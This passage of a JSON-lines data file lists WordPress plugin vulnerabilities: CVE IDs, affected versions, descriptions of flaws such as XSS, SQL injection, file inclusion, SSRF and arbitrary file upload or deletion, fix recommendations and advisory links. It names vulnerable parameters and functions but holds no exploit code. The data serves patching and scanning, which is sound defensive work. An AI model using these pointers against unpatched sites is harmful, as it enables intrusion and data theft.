version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/feee3268-b384-400c-a76d-e5d7972c05b7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/feee3268-b384-400c-a76d-e5d7972c05b7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/tags\\\/2.2.68\\\/src\\\/functions-rest.php#L1670\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/tags\\\/2.2.68\\\/src\\\/functions-rest.php#L1670\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/tags\\\/2.2.69\\\/includes\\\/blocks\\\/functions-rest.php#L1670\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/tags\\\/2.2.69\\\/includes\\\/blocks\\\/functions-rest.php#L1670\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6645","slug":"post-grid","versionImpact":"2.2.64","versionEndExcluding":"2.2.65","description":"The Post Grid Combo \u2013 36+ Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom JS parameter in all versions up to, and including, 2.2.64 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.65, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab777672-6eef-4078-932d-24bb784107fa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab777672-6eef-4078-932d-24bb784107fa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3010342%40post-grid%2Ftrunk&old=2999466%40post-grid%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3010342%40post-grid%2Ftrunk&old=2999466%40post-grid%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4284","slug":"post-timeline","versionEndExcluding":"2.2.6","description":"The Post Timeline WordPress plugin before 2.2.6 does not sanitise and escape an invalid nonce before outputting it back in an AJAX response, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c126869-0afa-456f-94cc-10334964e5f9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c126869-0afa-456f-94cc-10334964e5f9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8378","slug":"safe-svg","versionImpact":"2.2.5","versionEndExcluding":"2.2.6","description":"The Safe SVG WordPress plugin before 2.2.6 has its sanitisation code is only running for paths that call wp_handle_upload, but not for example for code that uses wp_handle_sideload which is often used to upload attachments via raw POST data.","recommendation":"Update to version 2.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17be4bf2-486d-43ab-b87a-2117c8d77ca8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17be4bf2-486d-43ab-b87a-2117c8d77ca8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-48764","slug":"guardgiant","versionEndExcluding":"2.2.6","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in GuardGiant Brute Force Protection WordPress Brute Force Protection \u2013 Stop Brute Force Attacks.This issue affects WordPress Brute Force Protection \u2013 Stop Brute Force Attacks: from n\/a through 2.2.5.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/guardgiant\\\/wordpress-wordpress-brute-force-protection-stop-brute-force-attacks-plugin-2-2-5-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/guardgiant\\\/wordpress-wordpress-brute-force-protection-stop-brute-force-attacks-plugin-2-2-5-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5454","slug":"templately","versionImpact":"2.2.5","versionEndExcluding":"2.2.6","description":"The Templately WordPress plugin before 2.2.6 does not properly authorize the `saved-templates\/delete` REST API call, allowing unauthenticated users to delete arbitrary posts.","recommendation":"Update to version 2.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1854f77f-e12a-4370-9c44-73d16d493685\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1854f77f-e12a-4370-9c44-73d16d493685\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2288","slug":"otter-blocks","versionEndExcluding":"2.2.6","description":"The Otter WordPress plugin before 2.2.6 does not sanitize some user-controlled file paths before performing file operations on them. This leads to a PHAR deserialization vulnerability on PHP < 8.0 using the phar:\/\/ stream wrapper.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93acb4ee-1053-48e1-8b69-c09dc3b2f302\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93acb4ee-1053-48e1-8b69-c09dc3b2f302\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3275","slug":"themesflat-addons-for-elementor","versionImpact":"2.2.5","versionEndExcluding":"2.2.6","description":"The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the TF E Slider widget in all versions up to, and including, 2.2.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/tf-flexslider.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themesflat-addons-for-elementor\\\/trunk\\\/assets\\\/js\\\/tf-flexslider.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268183\\\/themesflat-addons-for-elementor\\\/tags\\\/2.2.2\\\/assets\\\/js\\\/tf-flexslider.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268183\\\/themesflat-addons-for-elementor\\\/tags\\\/2.2.2\\\/assets\\\/js\\\/tf-flexslider.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ec73a61-9ae2-4e6f-b1fa-2d61f27d6809?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ec73a61-9ae2-4e6f-b1fa-2d61f27d6809?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12131","slug":"wp-job-portal","versionImpact":"2.2.5","versionEndExcluding":"2.2.6","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.2.5 due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to submit resumes for other applicants when applying for jobs.","recommendation":"Update to version 2.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.2.6\\\/modules\\\/jobapply\\\/model.php?rev=3216415\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.2.6\\\/modules\\\/jobapply\\\/model.php?rev=3216415\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4772ab0-41cd-4b35-bda9-d72e0fd7b7a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4772ab0-41cd-4b35-bda9-d72e0fd7b7a5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8268","slug":"frontend-dashboard","versionImpact":"2.2.4","versionEndExcluding":"2.2.5","description":"The Frontend Dashboard plugin for WordPress is vulnerable to unauthorized code execution due to insufficient filtering on callable methods\/functions via the ajax_request() function in all versions up to, and including, 2.2.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to call arbitrary functions that can be leverage for privilege escalation by changing user's passwords.","recommendation":"Update to version 2.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d66694a-c99f-44f8-8004-1a47ad9f9250?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d66694a-c99f-44f8-8004-1a47ad9f9250?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.4\\\/route\\\/class-fed-request.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.4\\\/route\\\/class-fed-request.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147868\\\/frontend-dashboard\\\/tags\\\/2.2.5\\\/route\\\/class-fed-request.php?old=3048034&old_path=frontend-dashboard%2Ftags%2F2.2.4%2Froute%2Fclass-fed-request.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147868\\\/frontend-dashboard\\\/tags\\\/2.2.5\\\/route\\\/class-fed-request.php?old=3048034&old_path=frontend-dashboard%2Ftags%2F2.2.4%2Froute%2Fclass-fed-request.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5526","slug":"buddypress-docs","versionImpact":"2.2.4","versionEndExcluding":"2.2.5","description":"The BuddyPress Docs WordPress plugin before 2.2.5 lacks proper access controls and allows a logged in user to view and download files belonging to another user","recommendation":"Update to version 2.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/10196cd3-5bf7-4e40-a4f7-4ff2d34d516d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/10196cd3-5bf7-4e40-a4f7-4ff2d34d516d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12132","slug":"wp-job-portal","versionImpact":"2.2.4","versionEndExcluding":"2.2.5","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.2.4 due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create jobs for companies that are unaffiliated with the attacker.","recommendation":"Update to version 2.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210251\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210251\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d19ac6fc-029f-4f19-913e-e082acecc594?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d19ac6fc-029f-4f19-913e-e082acecc594?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-23825","slug":"tablepress","versionEndExcluding":"2.2.5","description":"TablePress is a table plugin for Wordpress. For importing tables, TablePress makes external HTTP requests based on a URL that is provided by the user. That user input is filtered insufficiently, which makes it is possible to send requests to unintended network locations and receive responses. On sites in a cloud environment like AWS, an attacker can potentially make GET requests to the instance's metadata REST API. If the instance's configuration is insecure, this can lead to the exposure of internal data, including credentials. This vulnerability is fixed in 2.2.5.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/TablePress\\\/TablePress\\\/security\\\/advisories\\\/GHSA-x8rf-c8x6-mrpg\",\"name\":\"https:\\\/\\\/github.com\\\/TablePress\\\/TablePress\\\/security\\\/advisories\\\/GHSA-x8rf-c8x6-mrpg\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/TablePress\\\/TablePress\\\/commit\\\/62aab50e7a9c486caaeff26dff4dc01e059ecb91\",\"name\":\"https:\\\/\\\/github.com\\\/TablePress\\\/TablePress\\\/commit\\\/62aab50e7a9c486caaeff26dff4dc01e059ecb91\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4776","slug":"wpschoolpress","versionImpact":"2.2.4","versionEndExcluding":"2.2.5","description":"The School Management System WordPress plugin before 2.2.5 uses the WordPress esc_sql() function on a field not delimited by quotes and did not first prepare the query, leading to a SQL injection exploitable by relatively low-privilege users like Teachers.","recommendation":"Update to version 2.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/59dd3917-01cb-479f-a557-021b2a5147df\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/59dd3917-01cb-479f-a557-021b2a5147df\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0844","slug":"popup-more","versionImpact":"2.1.6","versionEndExcluding":"2.2.5","description":"The Popup More Popups, Lightboxes, and more popup modules plugin for WordPress is vulnerable to Local File Inclusion in version 2.1.6 via the ycfChangeElementData() function. This makes it possible for authenticated attackers, with administrator-level access and above, to include and execute arbitrary files ending with \"Form.php\" on the server , allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 2.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7894a19c-b873-4c5b-8c82-6656cc306ee2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7894a19c-b873-4c5b-8c82-6656cc306ee2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/popup-more\\\/trunk\\\/classes\\\/Ajax.php#L184\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/popup-more\\\/trunk\\\/classes\\\/Ajax.php#L184\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12205","slug":"themesflat-addons-for-elementor","versionImpact":"2.2.4","versionEndExcluding":"2.2.5","description":"The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the TF E Slider Widget in all versions up to, and including, 2.2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215859%40themesflat-addons-for-elementor&new=3215859%40themesflat-addons-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215859%40themesflat-addons-for-elementor&new=3215859%40themesflat-addons-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45c6c041-91b0-4abe-ba72-ec1251651fdb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45c6c041-91b0-4abe-ba72-ec1251651fdb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1707","slug":"review-schema","versionImpact":"2.2.4","versionEndExcluding":"2.2.5","description":"The Review Schema plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.2.4 via post meta. This makes it possible for authenticated attackers, with contributor-level and above permissions, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.","recommendation":"Update to version 2.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/review-schema\\\/tags\\\/2.2.4\\\/app\\\/Shortcodes\\\/ReviewSchema.php#L108\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/review-schema\\\/tags\\\/2.2.4\\\/app\\\/Shortcodes\\\/ReviewSchema.php#L108\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3253799\\\/review-schema\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3253799\\\/review-schema\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b4de243-d337-4f29-a766-bcafb3848d1c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b4de243-d337-4f29-a766-bcafb3848d1c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7443","slug":"searchpro","versionImpact":"2.2.42","versionEndExcluding":"2.2.44","description":"The BerqWP \u2013 Automated All-In-One Page Speed Optimization for Core Web Vitals, Cache, CDN, Images, CSS, and JavaScript plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation via the store_javascript_cache.php file in all versions up to, and including, 2.2.42. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.2.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/searchpro\\\/trunk\\\/api\\\/store_javascript_cache.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/searchpro\\\/trunk\\\/api\\\/store_javascript_cache.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3330075\\\/searchpro\\\/trunk\\\/api\\\/register_apis.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3330075\\\/searchpro\\\/trunk\\\/api\\\/register_apis.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d7dc644-ab83-4f03-998a-ec8eda695161?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d7dc644-ab83-4f03-998a-ec8eda695161?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0074","slug":"wp-social-widget","versionEndExcluding":"2.2.4","description":"The WP Social Widget WordPress plugin before 2.2.4 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/82f543e3-9397-4364-9546-af5ea134fcd4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/82f543e3-9397-4364-9546-af5ea134fcd4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11461","slug":"form-data-collector","versionImpact":"2.2.3","versionEndExcluding":"2.2.4","description":"The Form Data Collector plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 2.2.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/form-data-collector\\\/tags\\\/2.2.3\\\/index.php#L165\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/form-data-collector\\\/tags\\\/2.2.3\\\/index.php#L165\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3199031%40form-data-collector&new=3199031%40form-data-collector&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3199031%40form-data-collector&new=3199031%40form-data-collector&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dba72ee-7c38-4e10-9c0c-35d12aa83442?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dba72ee-7c38-4e10-9c0c-35d12aa83442?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13474","slug":"ltl-freight-quotes-purolator-freight-edition","versionImpact":"2.2.3","versionEndExcluding":"2.2.4","description":"The LTL Freight Quotes \u2013 Purolator Edition plugin for WordPress is vulnerable to SQL Injection via the 'dropship_edit_id' and 'edit_id' parameters in all versions up to, and including, 2.2.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3244300%40ltl-freight-quotes-purolator-freight-edition&new=3244300%40ltl-freight-quotes-purolator-freight-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3244300%40ltl-freight-quotes-purolator-freight-edition&new=3244300%40ltl-freight-quotes-purolator-freight-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2db0b8c9-7908-484d-9a02-1c50f88efdd0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2db0b8c9-7908-484d-9a02-1c50f88efdd0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12061","slug":"events-addon-for-elementor","versionImpact":"2.2.3","versionEndExcluding":"2.2.4","description":"The Events Addon for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.2.3 via the naevents_elementor_template shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","recommendation":"Update to version 2.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208546%40events-addon-for-elementor&new=3208546%40events-addon-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208546%40events-addon-for-elementor&new=3208546%40events-addon-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f59d9d8a-467a-4920-963a-da45f1f4462f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f59d9d8a-467a-4920-963a-da45f1f4462f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7712","slug":"madara-core","versionImpact":"2.2.3","versionEndExcluding":"2.2.4","description":"The Madara - Core plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the wp_manga_delete_zip() function in all versions up to, and including, 2.2.3. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 2.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/mangabooth.com\\\/product\\\/wp-manga-theme-madara\\\/\",\"name\":\"https:\\\/\\\/mangabooth.com\\\/product\\\/wp-manga-theme-madara\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9de8e90-5bda-4ab1-aa78-2748cd717376?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9de8e90-5bda-4ab1-aa78-2748cd717376?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8922","slug":"enquiry-quotation-for-woocommerce","versionImpact":"2.2.33.33","versionEndExcluding":"2.2.33.34","description":"The Product Enquiry for WooCommerce, WooCommerce product catalog plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.2.33.32 via deserialization of untrusted input in enquiry_detail.php. This makes it possible for authenticated attackers, with Author-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 2.2.33.34, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a485314-cd68-400c-b398-2f8529c6a3ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a485314-cd68-400c-b398-2f8529c6a3ab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155863\\\/enquiry-quotation-for-woocommerce\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155863\\\/enquiry-quotation-for-woocommerce\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7146","slug":"jet-tabs","versionImpact":"2.2.3","versionEndExcluding":"2.2.3.1","description":"The JetTabs for Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.2.3 via the 'switcher_preset' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 2.2.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a401a2dd-9b31-47d9-b841-f2e7042b8333?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a401a2dd-9b31-47d9-b841-f2e7042b8333?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/crocoblock.com\\\/plugins\\\/jettabs\\\/\",\"name\":\"https:\\\/\\\/crocoblock.com\\\/plugins\\\/jettabs\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4635","slug":"eventon-lite","versionImpact":"2.2.2","versionEndExcluding":"2.2.3","description":"The EventON plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in versions up to, and including, 2.2.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/115ad0b2-febe-485a-8fb5-9bd6edc37ef7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/115ad0b2-febe-485a-8fb5-9bd6edc37ef7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/xsn1210\\\/vul\\\/blob\\\/main\\\/xss%5BEventON%5D%20.md\",\"name\":\"https:\\\/\\\/github.com\\\/xsn1210\\\/vul\\\/blob\\\/main\\\/xss%5BEventON%5D%20.md\",\"refsource\":\"MISC\",\"tags\":[]}]"}
